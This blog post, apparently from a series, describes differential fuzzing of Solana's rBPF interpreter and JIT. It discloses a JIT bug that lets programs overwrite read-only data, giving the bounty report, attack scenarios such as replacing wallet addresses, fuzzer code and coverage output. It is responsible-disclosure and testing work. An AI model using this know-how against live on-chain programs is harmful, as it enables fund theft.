emit_address_translation call above it, we can determine that
that function likely handles the address translation and readonly
checks.
Further inspection shows that emit_address_translation actually
emits a call to… something:
This creates an x86 instruction with the opcode 0x81. Inspecting
closer and cross-referencing with an x86-64 opcode reference,
you can find that opcode 0x81 is only defined for 16-, 32-, and
64-bit register operands. If you want to use an 8-bit register
operand, you’ll need to use the 0x80 opcode variant.
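To see what the opcode choice changes on the wire, the sketch below hand-encodes the comparison quoted in the report later in this post, `cmp [rax+0x19], 0x0`, once with opcode 0x81 (32-bit operand, 32-bit immediate) and once with opcode 0x80 (8-bit operand, 8-bit immediate). It is a toy encoder limited to this one addressing form, and the function name is illustrative.

```python
def encode_cmp_rax_disp8(disp: int, imm: int, operand_bits: int) -> bytes:
    """Encode `cmp [rax+disp8], imm` for an 8-bit or 32-bit memory operand."""
    modrm = 0b01_111_000  # mod=01 (disp8), reg=/7 (cmp), rm=000 (rax)
    if operand_bits == 8:
        return bytes([0x80, modrm, disp & 0xFF, imm & 0xFF])
    if operand_bits == 32:
        immediate = (imm & 0xFFFFFFFF).to_bytes(4, "little")
        return bytes([0x81, modrm, disp & 0xFF]) + immediate
    raise ValueError("only 8- and 32-bit operands are modelled")


print(encode_cmp_rax_disp8(0x19, 0, 32).hex())
print(encode_cmp_rax_disp8(0x19, 0, 8).hex())
```

The ModRM and displacement bytes are identical in both forms; only the opcode decides whether the CPU compares one byte or four bytes starting at that address.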
A quick side note about testing code with different compilers
This bug actually was a bit weirder than it seems at first. Due
to differences in Rust struct padding between versions, at the time
that I reported the bug, the difference was spurious in stable
release. As a result, it’s quite likely that no one would have
noticed the bug until the next Rust release version.
From my report:
It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.
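The effect of the padding can be reproduced with plain bytes. The layout below is an assumption for illustration only: a one-byte flag at offset 0x19 followed by three padding bytes that happen to contain leftover data. The two functions model an 8-bit and a 32-bit comparison against zero.

```python
def is_writable_byte(region: bytes, offset: int) -> bool:
    """8-bit comparison: looks only at the flag itself."""
    return region[offset] != 0


def is_writable_dword(region: bytes, offset: int) -> bool:
    """32-bit comparison: also reads the three bytes after the flag."""
    return int.from_bytes(region[offset:offset + 4], "little") != 0


# Toy layout: a one-byte flag at offset 0x19 followed by three padding bytes.
region = bytearray(0x20)
region[0x19] = 0                      # flag says "read-only"
region[0x1A:0x1D] = b"\xAA\xAA\xAA"   # leftover, uninitialised padding

print(is_writable_byte(region, 0x19), is_writable_dword(region, 0x19))
```

With zeroed padding both checks agree, which is consistent with the bug appearing only under some compiler versions and build profiles.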
Proof of concept
Alright, now to create a PoC so that the people inspecting the bug
can validate it. Like last time, we’ll create an ELF, along with a
few different demonstrations of the effects of the bug.
Specifically, we want to demonstrate that read-only values in the
BPF target can be modified persistently, as our writes affect the
executable and thus all future executions of the JIT program.
value_in_ro.c
This program should fail, as the data to be overwritten should be
read-only. It will be executed by howdy.rs.
This program loads the compiled version of value_in_ro.c and
attaches a log syscall so that we can see the behaviour internally.
I confirmed that this syscall did not affect the runtime
behaviour.
This program, when executed, has the following output:
howdy
evil!
evil!
evil!
evil!
evil!
evil!
evil!
These first two files demonstrate the ability to overwrite the
readonly data present in binaries persistently. Notice that we
actually execute the JIT’d code multiple times, yet our changes
to the value in data are persistent.
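Why the change survives between runs can be shown with a toy model. Here `ToyExecutable` owns the read-only section and every run reads from and writes to that same buffer; the class, the function and the five-byte strings are illustrative and are not taken from value_in_ro.c or howdy.rs.

```python
class ToyExecutable:
    """Owns the read-only section that every execution shares (toy model)."""

    def __init__(self, rodata: bytes):
        self.ro_section = bytearray(rodata)


def run_once(executable: ToyExecutable) -> str:
    """Read the message, then perform the write that should have been rejected."""
    message = executable.ro_section.decode("ascii")
    executable.ro_section[:] = b"evil!"
    return message


exe = ToyExecutable(b"howdy")
outputs = [run_once(exe) for _ in range(4)]
print(outputs)
```

Only the first run sees the original value; every later run sees the overwritten one until the executable is loaded again.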
Implications
Suppose that there was a faulty offset or a user-controlled offset
present in a BPF-based on-chain program. A malicious user could
modify the readonly data of the program to replace certain contexts.
In the best case scenario, this might lead to DoS of the program.
In the worst case, this could lead to the replacement of fund
amounts, of wallet addresses, etc.
Reporting
Having assembled my proof-of-concepts, my implications, and so on,
I sent in the following report to Solana on February 4th:
Report for bug 2 as submitted to Solana
An incorrectly sized memory operand emitted by src/jit.rs:1490 may lead to .rodata section corruption due to an incorrect is_writable check. The cmp emitted is cmp DWORD PTR [rax+0x19], 0x0. As a result, when the uninitialised data present in the field padding of MemoryRegion is non-zero, the comparison will fail and assume that the section is writable. The data which is overwritten is persistent during the lifetime of the Executable instance as the data overwritten is in Executable.ro_section and thus affects future executions of the program without recompilation.
It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.
The first attack scenario where this vulnerability may be leveraged is in corruption of believed read-only data; see value_in_ro.{c,so} (intended to be placed within tests/elfs/) as an example of this behaviour. The example provided is contrived, but in scenarios where BPF programs do not correctly sanitise offsets in input, it may be possible for remote attackers to craft payloads which corrupt data within the .rodata section and thus replace secrets, operational data, etc. In the worst case, this may include replacement of critical data such as fixed wallet addresses for the lifetime of the Executable instance, which may be many executions. To test this behaviour, refer to howdy.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.
The second attack scenario is in corruption of BPF source code, which poisons future analysis and compilation. In the worst case (which is probably not a valid scenario), if the Executable is erroneously JIT compiled a second time after being executed in JIT once, the JIT compilation may emit unchecked BPF instructions as the verifier used in from_elf/from_text_bytes is not used per-compilation. Analysis and tracing is similarly corrupted, which may be leveraged to obscure or misrepresent the instructions which were previously executed. An example of the latter is provided in analysis-corruption.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.
While this vulnerability is largely uncategorised by the security policy provided, due to the possibility of the corruption of believed read-only data, I propose that this vulnerability be categorised under Other Attacks or Safety Violations.
Solana classified this bug as a Denial-of-Service (Non-RPC) and
awarded $100k. I disagreed strongly with this classification, but
Solana said that due to the low likelihood of the exploitation of
this bug (requiring a vulnerability in the on-chain program) they
would offer $100k instead of the originally suggested $1m or $400k.
They would not move on this point.
However, I would offer that, if that was actually the basis for the
bug classification, they should update their Security Policy to
reflect it. It was obviously very disappointing to hear
that they would not be offering the bounty I expected given the
classification categories provided.
Okay, so what’d you do with the money??
It would be bad form of me to not explain the incredible flexibility
shown by Solana in terms of how they handled my payout. I intended
to donate the funds to the Texas A&M Cybersecurity Club, at which
I gained a lot of the skills necessary to perform this research and
these exploits, and Solana was very willing to sidestep their listed
policy and donate the funds directly in USD rather than making me
handle the tokens on my own, which would have dramatically affected
how much I could have donated due to tax. So, despite my concerns
regarding their policy, I was very pleased with their willingness
to accommodate my wishes with the bounty payout.
By applying well-known fuzzing techniques to a popular target, I found several bugs that in total yielded over $200K in bounties. In this article I will demonstrate how powerful fuzzing can be when applied to software which has not yet faced sufficient testing.
If you’re here just for the bug disclosures, see Part 2, though I encourage
you all, even those who have not yet tried their hand at fuzzing, to read
through this.
Exposition
A few friends and I ran a little Discord server (now a Matrix space) in
which we discussed security and vulnerability research techniques. One of the
things we have running in the server is a bot which posts every single CVE as
it comes out. And, yeah, I read a lot of them.
One day, the bot posted something that caught my eye:
This marks the beginning of our timeline: January 28th. I had noticed this CVE
in particular for two reasons:
it was BPF, which I find to be an absurdly cool concept as it’s used in the
Linux kernel (a JIT compiler in the kernel!!! what!!!)
it was a JIT compiler written in Rust
This CVE showed up almost immediately after I had developed some relatively
intensive fuzzing for some of my own Rust software (specifically, a
crate for verifying sokoban solutions
where I had observed similar issues
and thought “that looks familiar”).
Knowing what I had learned from my experience fuzzing my own software and that
bugs in Rust programs could be quite easily found with the combo of cargo fuzz
and arbitrary, I thought: “hey, why
not?”.
The Target, and figuring out how to test it
Solana, as several of you likely know, “is a
decentralized blockchain built to enable scalable, user-friendly apps for the
world”. They are primarily known for their cryptocurrency, SOL, but Solana is
also a blockchain which can run really any form of smart contract.
rBPF in particular is a self-described
“Rust virtual machine and JIT compiler for eBPF programs”. Notably, it
implements both an interpreter and a JIT compiler for BPF programs. In other
words: two different implementations of the same program, which should
theoretically exhibit the same behaviour when executed.
I was lucky enough to both take a software testing course in university and to
have been part of a research group doing fuzzing (admittedly, we were fuzzing
hardware, not software, but the concepts translate). A concept that I had hung
onto in particular is the idea of test oracles
– a way to distinguish what is “correct” behaviour and what is not in a
design under test.
In particular, something that stood out to me about the presence of both an
interpreter and a JIT compiler in rBPF is that we, in effect, had a perfect
pseudo-oracle; as Wikipedia puts it:
a separately written program which can take the same input as the program or system under test so that their outputs may be compared to understand if there might be a problem to investigate.
Those of you who have more experience in fuzzing will recognise this concept
as differential fuzzing,
but I think we can often overlook that differential fuzzing is just another
face of a pseudo-oracle.
In this particular case, we can execute the interpreter, one implementation of
rBPF, and then execute the JIT compiled version, another implementation, with
the same inputs (i.e., memory state, entrypoint, code, etc.) and see if their
outputs are different. If they are, one of them must necessarily be
incorrect per the description of the rBPF crate: two implementations of
exactly the same behaviour.
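The pseudo-oracle idea can be sketched without any of rBPF. The toy instruction set, both `run_*` functions, and the planted bug below are hypothetical stand-ins chosen for illustration; the only part that mirrors the approach described above is `differential_check`, which feeds the same program and input to two implementations and treats any disagreement as a finding.

```rust
/// A toy instruction set; a stand-in for BPF, not part of rBPF.
#[derive(Clone, Copy, Debug)]
enum Op {
    Add(u64),
    Mul(u64),
    Div(u64),
}

/// First implementation: rejects division by zero with an error.
fn run_reference(prog: &[Op], input: u64) -> Result<u64, String> {
    let mut acc = input;
    for op in prog {
        acc = match *op {
            Op::Add(n) => acc.wrapping_add(n),
            Op::Mul(n) => acc.wrapping_mul(n),
            Op::Div(0) => return Err("divide by zero".to_string()),
            Op::Div(n) => acc / n,
        };
    }
    Ok(acc)
}

/// Second implementation with a deliberately planted bug:
/// division by zero silently yields 0 instead of an error.
fn run_optimised(prog: &[Op], input: u64) -> Result<u64, String> {
    let mut acc = input;
    for op in prog {
        acc = match *op {
            Op::Add(n) => acc.wrapping_add(n),
            Op::Mul(n) => acc.wrapping_mul(n),
            Op::Div(n) => acc.checked_div(n).unwrap_or(0),
        };
    }
    Ok(acc)
}

/// The pseudo-oracle: neither side is trusted on its own, but if the two
/// disagree on the same input, at least one of them is wrong.
fn differential_check(prog: &[Op], input: u64) -> Result<(), String> {
    let reference = run_reference(prog, input);
    let optimised = run_optimised(prog, input);
    if reference == optimised {
        Ok(())
    } else {
        Err(format!(
            "mismatch: reference={:?}, optimised={:?}",
            reference, optimised
        ))
    }
}
```

A program such as `[Op::Add(2), Op::Mul(3)]` passes the check, while `[Op::Add(2), Op::Div(0)]` exposes the planted disagreement. Note that the check says nothing about which side is correct; that still takes manual triage.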
Writing a fuzzer
To start off, let’s try to throw a bunch of inputs at it without
really tuning to anything in particular. This allows us to sanity check that our basic fuzzing implementation actually works as we expect.
The dumb fuzzer
First, we need to figure out how to execute the interpreter. Thankfully, there
are several examples of this readily available in a variety of tests. I
referenced the test_interpreter_and_jit macro present in
ubpf_execution.rs
as the basis for how my so-called “dumb” fuzzer
executes.
I’ve provided a sequence of components you can look at one chunk at a time
before moving onto the whole fuzzer. Just click on the dropdowns to view the
code relevant to that step. You don’t necessarily need to do so to understand
the point of this post.
Step 1: Defining our inputs
We must define our inputs such that they’re actually useful for our fuzzer.
Thankfully, arbitrary makes it near
trivial to derive an input from raw bytes.
If you want to see the definition of ConfigTemplate, you can check it out in
common.rs,
but all you need to know is that its purpose is to test the interpreter under
a variety of different execution configurations. You don’t need its details
to understand the fundamental bits of the fuzzer.
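For readers who have not seen what “deriving an input from raw bytes” means in practice, here is a hand-rolled, std-only sketch of the idea. It is not arbitrary’s API and not the fuzzer’s real input type: the `DumbInput` name, the `from_raw` function, and the one-byte length prefix are assumptions made for illustration. The `prog` and `mem` field names simply mirror the fields used by the fuzz target in the next step.

```rust
/// Hand-rolled stand-in for a derived, structured fuzz input.
#[derive(Debug, PartialEq)]
struct DumbInput {
    /// Bytes to be interpreted as program text.
    prog: Vec<u8>,
    /// Bytes to be used as the program's input memory.
    mem: Vec<u8>,
}

impl DumbInput {
    /// Carves a structured input out of an unstructured byte string.
    /// The first byte says how many of the remaining bytes belong to
    /// `prog` (clamped to what is available); the rest become `mem`.
    fn from_raw(raw: &[u8]) -> Option<Self> {
        let (&len_byte, rest) = raw.split_first()?;
        let prog_len = (len_byte as usize).min(rest.len());
        let (prog, mem) = rest.split_at(prog_len);
        Some(DumbInput {
            prog: prog.to_vec(),
            mem: mem.to_vec(),
        })
    }
}
```

For example, the raw bytes `[2, 0x95, 0x00, 0xAA, 0xBB]` become a two-byte `prog` and a two-byte `mem`. The derive-based approach removes the need to write this kind of splitting code by hand for every field.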
Step 2: Setting up the VM
Setting up the fuzz target and the VM comes next. This will allow us to not
only execute our test, but later to actually check if the behaviour is
correct.
fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        &prog,
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    // TODO in step 3
});
You can find the details of how fuzz_target works in the
Rust Fuzz Book,
which covers it in more detail than would be appropriate here.
Step 3: Executing our input and comparing output
In this step, we just execute the VM with our provided input. In future
iterations, we’ll compare the output of interpreter vs JIT, but in this
version, we’re just executing the interpreter to see if we can induce crashes.
fuzz_target!(|data: DumbFuzzData| {
    // see step 2 for this bit

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1024 },
    )));
});
I use black_box here but I’m not entirely convinced that it’s necessary. I
added it to ensure that the result of the interpreted program’s execution
isn’t simply discarded and thus the execution marked unnecessary, but I’m
fairly certain it wouldn’t be regardless.
Note that we are not checking whether the execution failed here. If the BPF
program fails: we don’t care! We only care if the VM crashes for any reason.
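The “errors are fine, crashes are not” pattern looks roughly like the sketch below. The `execute` function is a hypothetical stand-in for running a program (it is not rBPF’s interpreter); `std::hint::black_box` is the standard-library function, used here the same way as in the step above.

```rust
use std::hint::black_box;

/// Hypothetical stand-in for running a program: even first bytes
/// "succeed", everything else is reported as an ordinary error.
fn execute(input: &[u8]) -> Result<u64, String> {
    match input.first() {
        Some(&byte) if byte % 2 == 0 => Ok(byte as u64),
        Some(_) => Err("program error".to_string()),
        None => Err("empty program".to_string()),
    }
}

/// Crash-only harness: the result is computed and then thrown away.
/// An `Err` is an uninteresting outcome; only a panic or abort inside
/// `execute` would surface as a fuzzing failure.
fn harness(input: &[u8]) {
    drop(black_box(execute(input)));
}
```

Calling `harness` with a failing input such as `&[1]` returns normally, which is exactly the point: the harness only reports inputs that bring the process down.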
Step 4: Put it together
Below is the final code for the fuzzer, including all of the bits I didn’t
show above for concision.
After executing the fuzzer, we can evaluate its effectiveness at finding
interesting inputs by checking its coverage after executing for a given time
(note the use of the -max_total_time flag). In this case, I want to
determine just how well it covers the function which handles
interpreter execution.
To do so, I issue the following commands:
If you’re not familiar with llvm coverage output, the first column is the line
number, the second column is the number of times that that particular line was
hit, and the third column is the code itself.
<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
 709|   763|    fn execute_program_interpreted_inner(
 710|   763|        &mut self,
 711|   763|        instruction_meter: &mut I,
 712|   763|        initial_insn_count: u64,
 713|   763|        last_insn_count: &mut u64,
 714|   763|    ) -> ProgramResult<E> {
 715|   763|        // R1 points to beginning of input memory, R10 to the stack of the first frame
 716|   763|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
 717|   763|        reg[1] = ebpf::MM_INPUT_START;
 718|   763|
 719|   763|        // Loop on instructions
 720|   763|        let config = self.executable.get_config();
 721|   763|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
                       ^0
 722|   763|        let mut remaining_insn_count = initial_insn_count;
 723|  136k|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
 724|  135k|            *last_insn_count += 1;
 725|  135k|            let pc = next_pc;
 726|  135k|            next_pc += 1;
 727|  135k|            let mut instruction_width = 1;
 728|  135k|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
 729|  135k|            let dst = insn.dst as usize;
 730|  135k|            let src = insn.src as usize;
 731|  135k|
 732|  135k|            if config.enable_instruction_tracing {
 733|     0|                let mut state = [0u64; 12];
 734|     0|                state[0..11].copy_from_slice(&reg);
 735|     0|                state[11] = pc as u64;
 736|     0|                self.tracer.trace(state);
 737|  135k|            }
 738|      |
 739|  135k|            match insn.opc {
 740|  135k|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
 741|   361|                    match insn.opc {
 742|    16|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
 743|   345|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
 744|      |                        _ => {
 745|      |                            #[cfg(debug_assertions)]
 746|     0|                            unreachable!("unexpected insn on r11")
 747|      |                        }
 748|      |                    }
 749|      |                }
 750|      |
 751|      |                // BPF_LD class
 752|      |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
 753|      |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
 754|      |                ebpf::LD_ABS_B => {
 755|     3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
 756|     3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                   ^0
 757|     0|                    reg[0] = unsafe { *host_ptr as u64 };
 758|      |                },
 759|      |                ebpf::LD_ABS_H => {
 760|     3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
 761|     3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                   ^0
 762|     0|                    reg[0] = unsafe { *host_ptr as u64 };
 763|      |                },
 764|      |                ebpf::LD_ABS_W => {
 765|     2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
 766|     2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                   ^0
 767|     0|                    reg[0] = unsafe { *host_ptr as u64 };
 768|      |                },
 769|      |                ebpf::LD_ABS_DW => {
 770|     4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
 771|     4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                   ^0
 772|     0|                    reg[0] = unsafe { *host_ptr as u64 };
 773|      |                },
 774|      |                ebpf::LD_IND_B => {
 775|     2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
 776|     2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                   ^0
 777|     0|                    reg[0] = unsafe { *host_ptr as u64 };
 778|      |                },
 779|      |                ebpf::LD_IND_H => {
 780|     3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
 781|     3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                   ^0
 782|     0|                    reg[0] = unsafe { *host_ptr as u64 };
 783|      |                },
 784|      |                ebpf::LD_IND_W => {
 785|     7|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
 786|     7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                   ^0
 787|     0|                    reg[0] = unsafe { *host_ptr as u64 };
 788|      |                },
 789|      |                ebpf::LD_IND_DW => {
 790|     3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
 791|     3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                   ^0
 792|     0|                    reg[0] = unsafe { *host_ptr as u64 };
 793|      |                },
 794|      |
 795|     0|                ebpf::LD_DW_IMM => {
 796|     0|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
 797|     0|                    instruction_width = 2;
 798|     0|                    next_pc += 1;
 799|     0|                    reg[dst] = insn.imm as u64;
 800|     0|                },
 801|      |
 802|      |                // BPF_LDX class
 803|      |                ebpf::LD_B_REG => {
 804|    18|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
 805|    18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                   ^2
 806|     2|                    reg[dst] = unsafe { *host_ptr as u64 };
 807|      |                },
 808|      |                ebpf::LD_H_REG => {
 809|    18|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
 810|    18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                   ^6
 811|     6|                    reg[dst] = unsafe { *host_ptr as u64 };
 812|      |                },
 813|      |                ebpf::LD_W_REG => {
 814|   365|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
 815|   365|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                   ^348
 816|   348|                    reg[dst] = unsafe { *host_ptr as u64 };
 817|      |                },
 818|      |                ebpf::LD_DW_REG => {
 819|    15|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
 820|    15|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                   ^5
 821|     5|                    reg[dst] = unsafe { *host_ptr as u64 };
 822|      |                },
 823|      |
 824|      |                // BPF_ST class
 825|      |                ebpf::ST_B_IMM => {
 826|    26|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 827|    26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                   ^20
 828|    20|                    unsafe { *host_ptr = insn.imm as u8 };
 829|      |                },
 830|      |                ebpf::ST_H_IMM => {
 831|    23|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 832|    23|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                   ^13
 833|    13|                    unsafe { *host_ptr = insn.imm as u16 };
 834|      |                },
 835|      |                ebpf::ST_W_IMM => {
 836|    12|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 837|    12|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                   ^5
 838|     5|                    unsafe { *host_ptr = insn.imm as u32 };
 839|      |                },
 840|      |                ebpf::ST_DW_IMM => {
 841|    17|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 842|    17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                   ^11
 843|    11|                    unsafe { *host_ptr = insn.imm as u64 };
 844|      |                },
 845|      |
 846|      |                // BPF_STX class
 847|      |                ebpf::ST_B_REG => {
 848|    17|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 849|    17|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                   ^3
 850|     3|                    unsafe { *host_ptr = reg[src] as u8 };
 851|      |                },
 852|      |                ebpf::ST_H_REG => {
 853|    13|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 854|    13|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                   ^3
 855|     3|                    unsafe { *host_ptr = reg[src] as u16 };
 856|      |                },
 857|      |                ebpf::ST_W_REG => {
 858|    19|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 859|    19|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                   ^7
 860|     7|                    unsafe { *host_ptr = reg[src] as u32 };
 861|      |                },
 862|      |                ebpf::ST_DW_REG => {
 863|     8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 864|     8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                   ^2
 865|     2|                    unsafe { *host_ptr = reg[src] as u64 };
 866|      |                },
 867|      |
 868|      |                // BPF_ALU class
 869| 1.06k|                ebpf::ADD32_IMM => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32) as u64,
 870|   695|                ebpf::ADD32_REG => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32) as u64,
 871|   710|                ebpf::SUB32_IMM => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32) as u64,
 872|   345|                ebpf::SUB32_REG => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32) as u64,
 873| 1.03k|                ebpf::MUL32_IMM => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32) as u64,
 874| 2.07k|                ebpf::MUL32_REG => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32) as u64,
 875| 1.03k|                ebpf::DIV32_IMM => reg[dst] = (reg[dst] as u32 / insn.imm as u32) as u64,
 876|      |                ebpf::DIV32_REG => {
 877|     4|                    if reg[src] as u32 == 0 {
 878|     2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 879|     2|                    }
 880|     2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
 881|      |                },
 882|      |                ebpf::SDIV32_IMM => {
 883|   346|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
                                   ^0
 884|     0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 885|   346|                    }
 886|   346|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
 887|      |                }
 888|      |                ebpf::SDIV32_REG => {
 889|    13|                    if reg[src] as i32 == 0 {
 890|     2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 891|    11|                    }
 892|    11|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
                                   ^0
 893|     0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 894|    11|                    }
 895|    11|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
 896|      |                },
 897|   346|                ebpf::OR32_IMM => reg[dst] = (reg[dst] as u32 | insn.imm as u32) as u64,
 898|   351|                ebpf::OR32_REG => reg[dst] = (reg[dst] as u32 | reg[src] as u32) as u64,
 899|   345|                ebpf::AND32_IMM => reg[dst] = (reg[dst] as u32 & insn.imm as u32) as u64,
 900| 1.03k|                ebpf::AND32_REG => reg[dst] = (reg[dst] as u32 & reg[src] as u32) as u64,
 901|     0|                ebpf::LSH32_IMM => reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
 902|   369|                ebpf::LSH32_REG => reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
 903|     0|                ebpf::RSH32_IMM => reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
 904|   346|                ebpf::RSH32_REG => reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
 905|   690|                ebpf::NEG32 => { reg[dst] = (reg[dst] as i32).wrapping_neg() as u64; reg[dst] &= u32::MAX as u64; },
 906|   347|                ebpf::MOD32_IMM => reg[dst] = (reg[dst] as u32 % insn.imm as u32) as u64,
 907|      |                ebpf::MOD32_REG => {
 908|     4|                    if reg[src] as u32 == 0 {
 909|     2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 910|     2|                    }
 911|     2|                    reg[dst] = (reg[dst] as u32 % reg[src] as u32) as u64;
 912|      |                },
 913| 1.04k|                ebpf::XOR32_IMM => reg[dst] = (reg[dst] as u32 ^ insn.imm as u32) as u64,
 914| 2.74k|                ebpf::XOR32_REG => reg[dst] = (reg[dst] as u32 ^ reg[src] as u32) as u64,
 915|   349|                ebpf::MOV32_IMM => reg[dst] = insn.imm as u32 as u64,
 916| 1.03k|                ebpf::MOV32_REG => reg[dst] = (reg[src] as u32) as u64,
 917|     0|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
 918|     2|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
 919|     0|                ebpf::LE => {
 920|     0|                    reg[dst] = match insn.imm {
 921|     0|                        16 => (reg[dst] as u16).to_le() as u64,
 922|     0|                        32 => (reg[dst] as u32).to_le() as u64,
 923|     0|                        64 => reg[dst].to_le(),
 924|      |                        _ => {
 925|     0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 926|      |                        }
 927|      |                    };
 928|      |                },
 929|     0|                ebpf::BE => {
 930|     0|                    reg[dst] = match insn.imm {
 931|     0|                        16 => (reg[dst] as u16).to_be() as u64,
 932|     0|                        32 => (reg[dst] as u32).to_be() as u64,
